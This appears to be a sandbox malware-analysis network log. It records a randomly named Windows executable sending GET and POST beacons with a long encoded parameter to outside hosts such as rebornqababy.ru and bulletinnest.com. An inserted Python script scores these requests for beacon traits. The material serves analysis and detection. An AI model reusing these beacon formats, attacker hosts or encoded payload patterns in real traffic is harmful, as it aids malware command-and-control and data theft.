                                                          Data Ascii: GBbljTO=iGzDLtGg+hLO32Acy6fUAy5CtluIjZBLSx9ouT/9zceCJP/5j26uPSS13rkspSU/hthdsRNaeYgtvTtOjtI6ErQva1gVSP+YBSvOgikxoSXa2CXrRmoZY4VGXMV5Hh0pTG1O+UTrY4b7IPpprkHAjys5Y+sLMUrajYMTNmZ8i3s4yB1bQCKODT8GrxUly77nRs6JgpTtagAlpzSEbb+MhgOIc7aAytqHpOAfmwqDfM1lny8UpK8kMu+7XGrobGyRxp/Ja5UboMKVutFhdoynTsje7g/nVVVpkpiqZo7RLqDcxGtlohuq4gCERFtl1QCl5MyOjNVas7snPTbQeZKiwWQ+rVUiMPvWcwnyGiiZLdFxpy2TjOcKtiMnIXO7+zvDgvcMPVUAcA0I24xsGYiOfwRG5v66Lf9Gxx7cU4x2jWDgTwXtiJjCbP5tYE7NiWSdrlbkioDyMU/xefr7DJXQwQlDuqnvDO4SN2W/hhCBkx2dd+YnyS9hZLYqMuoq5vqwCrSPyqKzsUx+2ktzGfl9nqXD3WOBIEts7v3Szq1iQBkBbHNBE6gl4G0E8Prw6gl8QBRw3vJe6jxLO5TDCgHu61udOoT2TX6anHneQFuyr9PwWaohvwd4zUP1AZly7vgdGvmZyBJEtbhjfK+/16KpgnWoTG9lxvnoLtEpAlkrCyltq5OV93C/O7V1Xi7QD+aAYy5foeAfmupTfC3Jun0sV4Dsp9GHI/7Lxh2RX8gG4uUrsBqd2LS3IFNNO6M9AHYXmqDnnsmui827j3RqqSKdSNHJFVJjz5IkjDSBToG76W4bbTlZice1HjaA0furptYH0eu9zKp3UVH9c6WHvdNzQC/vrEUGejiNF/NP9xZGwjmUJGbgOMP/cgBShSXpvxnobLbsUSOp71LxeNyte2lgrrEbvap/cMk66MLhBaub19I71Xq4AIdxfkx5Uq4AYlyrHhU34HXidiUs+6mIKQ8qK9HC00GyntrgIWKmHt85gcXB [TRUNCATED]
                                                          Timestamp: Jul 2, 2024 14:05:13.036138058 CEST | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:12 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          36 | 192.168.2.6 | 49759 | 87.236.19.243 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:14.826283932 CEST | 485 | OUT | GET /waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.rebornqababy.ru
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:15.585630894 CEST | 482 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:15 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 279
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 65 62 6f 72 6e 71 61 62 61 62 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rebornqababy.ru Port 80</address></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          37 | 192.168.2.6 | 49760 | 135.181.212.206 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:20.690686941 CEST | 758 | OUT | POST /r7gq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.bulletinnest.com
                                                          Origin: http://www.bulletinnest.com
                                                          Referer: http://www.bulletinnest.com/r7gq/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 45 37 77 33 42 62 38 6d 42 6e 61 6a 4f 67 6d 6a 2f 61 56 4d 63 4f 45 31 6c 77 74 6c 47 66 6b 4c 64 34 71 53 6e 39 59 36 49 46 71 34 47 34 32 6b 45 4e 63 6f 34 63 2f 75 47 42 6c 7a 74 57 72 72 4e 32 67 77 6f 30 34 30 4d 6a 61 67 6a 67 6a 62 76 51 76 4a 6d 55 76 56 69 72 67 46 4c 42 44 53 61 34 6f 52 67 42 30 30 37 6f 6d 79 51 76 4a 41 2b 6e 4e 50 74 38 32 79 76 4d 6e 55 7a 6e 42 6e 32 6b 57 2f 32 71 33 42 72 34 55 6f 54 6f 35 61 69 44 71 31 2f 72 58 34 79 62 59 33 4d 6e 59 31 7a 41 47 77 55 53 2f 63 6b 53 73 4f 32 72 77 68 34 68 49 46 4f 42 34 39 38 50 38 6d 39 79 42 5a 5a 33 5a 67 67 6e 4e 65 6c 2b 73 68
                                                          Data Ascii: GBbljTO=E7w3Bb8mBnajOgmj/aVMcOE1lwtlGfkLd4qSn9Y6IFq4G42kENco4c/uGBlztWrrN2gwo040MjagjgjbvQvJmUvVirgFLBDSa4oRgB007omyQvJA+nNPt82yvMnUznBn2kW/2q3Br4UoTo5aiDq1/rX4ybY3MnY1zAGwUS/ckSsO2rwh4hIFOB498P8m9yBZZ3ZggnNel+sh
                                                          Jul 2, 2024 14:05:21.698502064 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:21 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f [TRUNCATED]
                                                          Data Ascii: 1f0b<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.6 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://bulletinnest.com/#website","url":"https://bulletinnest.com/","name":"bulletinnest","description":"","publisher":{"@id":"https://bulletinnest.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://
                                                          Jul 2, 2024 14:05:21.698524952 CEST | 1236 | IN | Data Raw: 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 7d 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72
                                                          Data Ascii: bulletinnest.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://bulletinnest.com/#organization","name":"bulletinnest","url":"https://bulletinnest.com/",
                                                          Jul 2, 2024 14:05:21.698544979 CEST | 1236 | IN | Data Raw: 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 35 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d
                                                          Data Ascii: com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e
                                                          Jul 2, 2024 14:05:21.698555946 CEST | 1236 | IN | Data Raw: 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22
                                                          Data Ascii: Element("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChi
                                                          Jul 2, 2024 14:05:21.698565006 CEST | 1236 | IN | Data Raw: 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e
                                                          Data Ascii: .everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.rea
                                                          Jul 2, 2024 14:05:21.698576927 CEST | 1236 | IN | Data Raw: 2d 62 6c 6f 63 6b 2d 63 6f 64 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e
                                                          Data Ascii: -block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.
                                                          Jul 2, 2024 14:05:21.698586941 CEST | 1236 | IN | Data Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                          Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                                                          Jul 2, 2024 14:05:21.698697090 CEST | 1236 | IN | Data Raw: 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a
                                                          Data Ascii: rated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff
                                                          Jul 2, 2024 14:05:21.698721886 CEST | 1236 | IN | Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67
                                                          Data Ascii: --wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,19
                                                          Jul 2, 2024 14:05:21.698734999 CEST | 1236 | IN | Data Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 72 65 67 75 6c 61 72 3a 20 31 36 70 78 3b 2d 2d 77 70 2d 2d
                                                          Data Ascii: wp--preset--font-size--x-large: 42px;--wp--preset--font-size--regular: 16px;--wp--preset--font-size--larger: 36px;--wp--preset--font-size--huge: 48px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--
                                                          Jul 2, 2024 14:05:21.703478098 CEST | 1236 | IN | Data Raw: 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d
                                                          Data Ascii: ck-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{colo
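Sessions 36 and 37 above show the two request shapes this process emits from the same PID: a GET to a short directory path whose query carries one short parameter and one long base64-looking parameter (GBbljTO), and a POST to another short directory path whose form body carries the same parameter name, with Origin and Referer pointing back at the host and path being posted to, a fixed Windows 7 / Chrome 44 User-Agent, and Connection: close. Both servers answer 404, so a triage rule must not depend on the response. The following Python is an added example for this report, not Joe Sandbox code: it parses raw HTTP requests, scores them against the traits visible in this capture, and reports parameter names shared between GET queries and POST bodies. The two sample requests are copied from sessions 36 and 37; the benign control request, the indicator names and the three-trait threshold are assumptions made for the example, not anything the report states.

```python
"""Heuristic triage of the HTTP beacons recorded in sessions 36 and 37.

Added example, not Joe Sandbox code. Traits are taken from the captured
requests on this page; they are triage heuristics, not a vendor signature,
and FLAG_THRESHOLD is an assumption.
"""
import re
from urllib.parse import urlsplit

DATED_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36")
SHORT_DIR = re.compile(r"^/[a-z0-9]{3,6}/$")          # /waey/, /r7gq/
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")     # one long encoded value
FLAG_THRESHOLD = 3                                    # assumption


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def split_params(encoded):
    """Split k=v&k=v without percent-decoding, so '+' and '/' survive."""
    pairs = []
    for item in encoded.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def beacon_indicators(req):
    """Return the names of the captured-traffic traits this request shows."""
    hits = []
    hdr = req["headers"]
    parts = urlsplit(req["target"])
    if SHORT_DIR.match(parts.path):
        hits.append("short-dir-path")
    params = split_params(parts.query)
    if req["method"] == "POST":
        params += split_params(req["body"])
    if any(B64ISH.match(value) for _, value in params):
        hits.append("long-encoded-param")
    host = hdr.get("host", "")
    if (req["method"] == "POST"
            and hdr.get("origin") == f"http://{host}"
            and hdr.get("referer") == f"http://{host}{parts.path}"):
        hits.append("self-referer")
    if hdr.get("user-agent") == DATED_UA:
        hits.append("dated-chrome-ua")
    if hdr.get("connection", "").lower() == "close":
        hits.append("connection-close")
    return hits


def is_beacon_like(req):
    return len(beacon_indicators(req)) >= FLAG_THRESHOLD


def shared_param_names(reqs):
    """Parameter names used both in a GET query and in a POST body."""
    get_names, post_names = set(), set()
    for req in reqs:
        if req["method"] == "GET":
            get_names |= {n for n, _ in split_params(urlsplit(req["target"]).query)}
        elif req["method"] == "POST":
            post_names |= {n for n, _ in split_params(req["body"])}
    return get_names & post_names


# Copied from session 36 above (encoded value is the page's own).
GET_SESSION_36 = (
    "GET /waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQ"
    "Lvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMr"
    "aqkdBe97SwcqQ2Bw4z4= HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,"
    "image/avif,image/webp,image/apng,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.9\r\nConnection: close\r\n"
    f"Host: www.rebornqababy.ru\r\nUser-Agent: {DATED_UA}\r\n\r\n")

# Copied from session 37 above; Content-Length is derived from the body.
POST_BODY_37 = (
    "GBbljTO=E7w3Bb8mBnajOgmj/aVMcOE1lwtlGfkLd4qSn9Y6IFq4G42kENco4c/uGBlztWrr"
    "N2gwo040MjagjgjbvQvJmUvVirgFLBDSa4oRgB007omyQvJA+nNPt82yvMnUznBn2kW/2q3B"
    "r4UoTo5aiDq1/rX4ybY3MnY1zAGwUS/ckSsO2rwh4hIFOB498P8m9yBZZ3ZggnNel+sh")
POST_SESSION_37 = (
    "POST /r7gq/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,"
    "image/avif,image/webp,image/apng,*/*;q=0.8\r\n"
    "Accept-Language: en-US,en;q=0.9\r\nAccept-Encoding: gzip, deflate, br\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
    f"Content-Length: {len(POST_BODY_37)}\r\nHost: www.bulletinnest.com\r\n"
    "Origin: http://www.bulletinnest.com\r\n"
    "Referer: http://www.bulletinnest.com/r7gq/\r\n"
    f"User-Agent: {DATED_UA}\r\n\r\n" + POST_BODY_37)

# Constructed benign control, not from the capture.
BENIGN = ("GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
          "User-Agent: curl/8.4.0\r\nConnection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    reqs = [parse_http_request(r) for r in (GET_SESSION_36, POST_SESSION_37, BENIGN)]
    for label, req in zip(("session 36", "session 37", "benign"), reqs):
        print(f"{label}: flagged={is_beacon_like(req)} {beacon_indicators(req)}")
    print("shared parameter names:", shared_param_names(reqs))
```

Run against the two captured requests, the GET collects four traits and the POST all five, while the control request collects none; the shared name GBbljTO ties the GET query to the POST body, which is the kind of cross-request link worth pivoting on when the response status is useless.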


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          38 | 192.168.2.6 | 49761 | 135.181.212.206 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:23.232096910 CEST | 782 | OUT | POST /r7gq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.bulletinnest.com
                                                          Origin: http://www.bulletinnest.com
                                                          Referer: http://www.bulletinnest.com/r7gq/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 45 37 77 33 42 62 38 6d 42 6e 61 6a 49 42 57 6a 77 5a 74 4d 55 4f 45 32 67 77 74 6c 49 2f 6b 78 64 34 6d 53 6e 38 63 71 4c 77 61 34 47 5a 47 6b 46 50 30 6f 37 63 2f 75 4e 68 6c 71 6a 32 72 6b 4e 32 73 65 6f 30 30 30 4d 6a 65 67 6a 69 72 62 76 6e 37 4b 33 55 76 54 71 4c 67 48 46 68 44 53 61 34 6f 52 67 42 68 54 37 6f 65 79 51 65 35 41 2f 47 4e 4d 6a 63 32 78 2f 38 6e 55 35 48 42 6a 32 6b 57 4e 32 6f 44 2f 72 36 73 6f 54 70 4a 61 68 52 53 79 32 72 58 2b 76 4c 5a 76 50 33 52 48 72 42 37 6e 65 78 76 57 6c 68 67 37 7a 64 78 37 6b 53 49 6d 63 52 59 2f 38 4e 6b 55 39 53 42 7a 62 33 68 67 79 77 42 35 71 4b 4a 43 52 57 49 34 47 39 48 75 56 33 75 37 57 4e 47 55 42 30 47 6e 2f 67 3d 3d
                                                          Data Ascii: GBbljTO=E7w3Bb8mBnajIBWjwZtMUOE2gwtlI/kxd4mSn8cqLwa4GZGkFP0o7c/uNhlqj2rkN2seo000Mjegjirbvn7K3UvTqLgHFhDSa4oRgBhT7oeyQe5A/GNMjc2x/8nU5HBj2kWN2oD/r6soTpJahRSy2rX+vLZvP3RHrB7nexvWlhg7zdx7kSImcRY/8NkU9SBzb3hgywB5qKJCRWI4G9HuV3u7WNGUB0Gn/g==
                                                          Jul 2, 2024 14:05:24.248224974 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:23 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f [TRUNCATED]
                                                          Data Ascii: 1f0b<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.6 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://bulletinnest.com/#website","url":"https://bulletinnest.com/","name":"bulletinnest","description":"","publisher":{"@id":"https://bulletinnest.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://
                                                          Jul 2, 2024 14:05:24.248255014 CEST | 1236 | IN | Data Raw: 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 7d 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72
                                                          Data Ascii: bulletinnest.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://bulletinnest.com/#organization","name":"bulletinnest","url":"https://bulletinnest.com/",
